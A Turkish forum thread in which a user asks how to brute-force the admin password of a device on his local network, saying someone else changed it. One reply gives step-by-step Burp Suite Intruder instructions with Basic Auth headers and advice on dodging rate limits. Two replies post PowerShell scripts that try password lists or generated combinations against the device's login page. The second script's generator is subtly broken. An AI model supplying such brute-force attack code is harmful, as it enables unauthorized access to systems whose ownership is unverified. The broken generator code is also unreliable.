Chrome Üzerinden Şifre Bulma

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Silvanus
    Silvanus's avatar
    Kayıt Tarihi: 28/Nisan/2020
    Erkek
    Silvanus bunu yazdı

    Hocam bi liste oluşturacaksın, chatgptye bunu yaptıran bi python program yazdırabilirsin. Mesela 8 karakter olacak şekilde harf ve rakamlardan oluşacak tüm ihtimalleri bi txt ye kaydedeceksin. Bunun en temizi parola ile ilgili hatırladığım bi ayrıntı varsa bunu da söyle chatgptye ihtimal azaltsın. Sonr burp suite kurup bi tarayıcıya bunu proxy gireceksin. Firefox da basit olur bu işlem. Sonra paltforma giden get isteğini burp suite içerisinde intruder tool u var, o tool ile her parola için Authorization: Basic am9obkBleGFtcGxlLmNvbTphYmMxMjM= buna benzeyen bir header ekleyip tek tek request atacak. Response kodu 200 dönerse veya diğerlerinden farklı bir response dönerse bilki parolayı buldun. Burdaki değer username:password değerinin base64 encoded hali. Chatgpt ye bunu da söyle listeyi senin verdiğin username ile password ihtimali kombinasyonlarını oluşturup başına Authorization: Basic ekleyerek bi txt çıkarsın. İntruder da bu dosyayı input verip başlatabilirsin. Cihaz kendini kapatabilir ama çok requestte, o zaman da rate limit düşürüp denersin. Ama ihtimalleri azaltamazsan eğer haftalarca çalışır gene de bulamayabilirsin. Ben olsam böyle bulurdum. 

    Biraz karışık anlattıysam hakkını helal et. Sen derdini chatgpt ye anlat sonra benim yazdığımı yapıştır o daha güzel anlatır :)

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    34sileli
    34sileli's avatar
    Kayıt Tarihi: 26/Haziran/2015
    Erkek
    Silvanus bunu yazdı
    Silvanus bunu yazdı

    Hocam bi liste oluşturacaksın, chatgptye bunu yaptıran bi python program yazdırabilirsin. Mesela 8 karakter olacak şekilde harf ve rakamlardan oluşacak tüm ihtimalleri bi txt ye kaydedeceksin. Bunun en temizi parola ile ilgili hatırladığım bi ayrıntı varsa bunu da söyle chatgptye ihtimal azaltsın. Sonr burp suite kurup bi tarayıcıya bunu proxy gireceksin. Firefox da basit olur bu işlem. Sonra paltforma giden get isteğini burp suite içerisinde intruder tool u var, o tool ile her parola için Authorization: Basic am9obkBleGFtcGxlLmNvbTphYmMxMjM= buna benzeyen bir header ekleyip tek tek request atacak. Response kodu 200 dönerse veya diğerlerinden farklı bir response dönerse bilki parolayı buldun. Burdaki değer username:password değerinin base64 encoded hali. Chatgpt ye bunu da söyle listeyi senin verdiğin username ile password ihtimali kombinasyonlarını oluşturup başına Authorization: Basic ekleyerek bi txt çıkarsın. İntruder da bu dosyayı input verip başlatabilirsin. Cihaz kendini kapatabilir ama çok requestte, o zaman da rate limit düşürüp denersin. Ama ihtimalleri azaltamazsan eğer haftalarca çalışır gene de bulamayabilirsin. Ben olsam böyle bulurdum. 

    Biraz karışık anlattıysam hakkını helal et. Sen derdini chatgpt ye anlat sonra benim yazdığımı yapıştır o daha güzel anlatır :)

    Denicem hocam çok sağol 

    Yazılım konusunda fazla bilgim yok ama halledicem İnş 

  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    34sileli
    34sileli's avatar
    Kayıt Tarihi: 26/Haziran/2015
    Erkek

    brute force nasıl yaparım bunun bir programı var mı acaba

    http://admin:"şifre"@192.168.100.196/admin/net.shtml

    sorgusu ile şifreyi sayı harf ve karakter kombinasyonlarını deneyip sorgu yapan bir şey nasıl yapılır

  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    34sileli
    34sileli's avatar
    Kayıt Tarihi: 26/Haziran/2015
    Erkek
    hypnot1c bunu yazdı

    O bahsettiğin şifre tahmin eklentisinde belki linke göre denemede yapıyor olabilir. Tek bir satırla şu şekilde de bağlanıyor olman lazım. Belki fikir verir. Örnek;

    http://user:password@adress

    dediğin şekilde şifre ekranına ulaştım ama bu sorguyu otomatik yaptırabilecek bir program var mı acaba

    http://admin:şifre@192.168.100.196/admin/net.shtml

     

  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    JpnTr
    JpnTr's avatar
    Kayıt Tarihi: 12/Kasım/2015
    Erkek
    34sileli bunu yazdı
    hypnot1c bunu yazdı
     

    dediğin şekilde şifre ekranına ulaştım ama bu sorguyu otomatik yaptırabilecek bir program var mı acaba

    http://admin:şifre@192.168.100.196/admin/net.shtml

     

    $url = "http://192.168.100.196/admin/net.shtml"
    $username = "admin"
    
    $passwordFile = "C:\path\to\passwords.txt"
    
    $passwords = Get-Content -Path $passwordFile
    
    foreach ($password in $passwords) {
        try {
            # Create a credential object
            $securePassword = ConvertTo-SecureString -String $password -AsPlainText -Force
            $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $securePassword
    
            # Attempt to access the URL with the current password
            $response = Invoke-WebRequest -Uri $url -Credential $credential -ErrorAction Stop
    
     
            Write-Host "Success! Password is: $password"
            break
        } catch {
    next password
            Write-Host "Failed with password: $password"
        }
    }



    C:\path\to\passwords.txt yerine parola listesinin olduğu text dosyası hazırlayıp yolunu göstereceksin. Yukarıdaki kodu not defterine kopyalayıp dosya uzantısını .ps1 olarak kaydet. Powershell ISE açıp kaydettiğin ps1 dosyasını yükleyip çalıştır


    Bir cinayet işleniyorsa tek suçlu katil değildir
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    34sileli
    34sileli's avatar
    Kayıt Tarihi: 26/Haziran/2015
    Erkek
    JpnTr bunu yazdı
    34sileli bunu yazdı
    hypnot1c bunu yazdı
     

    dediğin şekilde şifre ekranına ulaştım ama bu sorguyu otomatik yaptırabilecek bir program var mı acaba

    http://admin:şifre@192.168.100.196/admin/net.shtml

     

    $url = "http://192.168.100.196/admin/net.shtml"
    $username = "admin"
    
    $passwordFile = "C:\path\to\passwords.txt"
    
    $passwords = Get-Content -Path $passwordFile
    
    foreach ($password in $passwords) {
        try {
            # Create a credential object
            $securePassword = ConvertTo-SecureString -String $password -AsPlainText -Force
            $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $securePassword
    
            # Attempt to access the URL with the current password
            $response = Invoke-WebRequest -Uri $url -Credential $credential -ErrorAction Stop
    
     
            Write-Host "Success! Password is: $password"
            break
        } catch {
    next password
            Write-Host "Failed with password: $password"
        }
    }



    C:\path\to\passwords.txt yerine parola listesinin olduğu text dosyası hazırlayıp yolunu göstereceksin. Yukarıdaki kodu not defterine kopyalayıp dosya uzantısını .ps1 olarak kaydet. Powershell ISE açıp kaydettiğin ps1 dosyasını yükleyip çalıştır

    Sağol hocam dediğin şekilde benim belirlediğim 2 haneli şifreyi buldu.  şifreleri içeren text dosyası oluşturuyorum şuan. Bu dosyanın içerisinde sayı, harf ve karakter içeren ve 10 haneye kadar olan olasılıkları çıkarıyorum. Çok uzun süreceğe benziyor ama en azından firmadan cevap gelene kadar denemek istedim.

    Bir soru daha sormak istiyorum, olasılıkları daha kısa sürede nasıl çıkarabileceğim bir yol var mı acaba 

    Edit

    Hocam olasılıkları metin belgesine yazmak yerine 10 hane olacak şekilde ve 4. Haneden sayı ile başlayan harf ve karakter içeren sorguyu nasıl sordurabilirim 

    34sileli tarafından 13/Mar/25 14:30 tarihinde düzenlenmiştir
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SweetyVolty
    SweetyVolty's avatar
    Kayıt Tarihi: 12/Temmuz/2008
    Homo

    benim anladığım şifre chrome'da kayıtlı değil mi? öncelikle passwords.google.com 'u denediniz mi? 

     

    Sonrasında da şunu denediniz mi? 

     

     

     

    password'u silip yerine text yazıyorsun ve enter'a basınca taa daaaaa. 

     

     

     

    tabi tüm olayı g*tümden anlamış da olabilirim emin değilim. 


    En kötü yazılımcı onarımcı dükkanlar oluyor onlar karttan non volatile rami söküp içindekileri okuyup da direk şifreyi de öğrenebilir? olayın adı neydi unuttum valla beynim bi dünya şu an...


    Çok sıkılıyom
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    34sileli
    34sileli's avatar
    Kayıt Tarihi: 26/Haziran/2015
    Erkek
    SweetyVolty bunu yazdı

    benim anladığım şifre chrome'da kayıtlı değil mi? öncelikle passwords.google.com 'u denediniz mi? 

     

    Sonrasında da şunu denediniz mi? 

     

     

     

    password'u silip yerine text yazıyorsun ve enter'a basınca taa daaaaa. 

     

     

     

    tabi tüm olayı g*tümden anlamış da olabilirim emin değilim. 


    En kötü yazılımcı onarımcı dükkanlar oluyor onlar karttan non volatile rami söküp içindekileri okuyup da direk şifreyi de öğrenebilir? olayın adı neydi unuttum valla beynim bi dünya şu an...

    Yok hocam tam olarak öyle değil, Google da kayıtlı fakat kayıtlı şifre doğru değil. Cihazın şifresini başka biri değiştirmiş ve yeni şifreyi bulmak için üstteki arkadaşların cevap verdiği gibi brute force yapmam gerekiyormuş. Bunu araştırdım ama şifre 10 hane olsa büyük küçük harf, sayı ve karakter olsa ebesinin ki kadar sorgu ve zaman gerekiyor. Yani zor ama şuan için denemekten başka yapacağım bir şey yok. Firma destek verene kadar.

  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    JpnTr
    JpnTr's avatar
    Kayıt Tarihi: 12/Kasım/2015
    Erkek

    4 ila 10 hane arasındaki parolaları otomatik deneme için bu işini görür

     

    $url = "http://192.168.100.196/admin/net.shtml"
    $username = "admin"
    
    # Function to generate all combinations of letters and numbers of a given length
    function Generate-Combinations {
        param (
            [int]$Length
        )
    
        $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        $combinations = @()
    
        # Generate all possible combinations of the given length
        $combinations = $chars.ToCharArray() | ForEach-Object {
            if ($Length -eq 1) {
                $_
            } else {
                $subCombinations = Generate-Combinations -Length ($Length - 1)
                $subCombinations | ForEach-Object {
                    $_ + $_
                }
            }
        }
    
        return $combinations
    }
    
    # Generate combinations from 4 to 10 characters
    for ($i = 4; $i -le 10; $i++) {
        $combinations = Generate-Combinations -Length $i
    
        foreach ($password in $combinations) {
            try {
                # Create a credential object
                $securePassword = ConvertTo-SecureString -String $password -AsPlainText -Force
                $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $securePassword
    
                # Attempt to access the URL with the current password
                $response = Invoke-WebRequest -Uri $url -Credential $credential -ErrorAction Stop
    
                Write-Host "Success! Password is: $password"
                return
            } catch {
                Write-Host "Failed with password: $password"
            }
        }
    }

     


    Bir cinayet işleniyorsa tek suçlu katil değildir
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    34sileli
    34sileli's avatar
    Kayıt Tarihi: 26/Haziran/2015
    Erkek
    JpnTr bunu yazdı

    4 ila 10 hane arasındaki parolaları otomatik deneme için bu işini görür

     

    $url = "http://192.168.100.196/admin/net.shtml"
    $username = "admin"
    
    # Function to generate all combinations of letters and numbers of a given length
    function Generate-Combinations {
        param (
            [int]$Length
        )
    
        $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        $combinations = @()
    
        # Generate all possible combinations of the given length
        $combinations = $chars.ToCharArray() | ForEach-Object {
            if ($Length -eq 1) {
                $_
            } else {
                $subCombinations = Generate-Combinations -Length ($Length - 1)
                $subCombinations | ForEach-Object {
                    $_ + $_
                }
            }
        }
    
        return $combinations
    }
    
    # Generate combinations from 4 to 10 characters
    for ($i = 4; $i -le 10; $i++) {
        $combinations = Generate-Combinations -Length $i
    
        foreach ($password in $combinations) {
            try {
                # Create a credential object
                $securePassword = ConvertTo-SecureString -String $password -AsPlainText -Force
                $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $securePassword
    
                # Attempt to access the URL with the current password
                $response = Invoke-WebRequest -Uri $url -Credential $credential -ErrorAction Stop
    
                Write-Host "Success! Password is: $password"
                return
            } catch {
                Write-Host "Failed with password: $password"
            }
        }
    }

     

     

    sağol hocam deneyeceğim ama zor gibi gibi

Toplam Hit: 3107 Toplam Mesaj: 31
password şifre kırıcı generex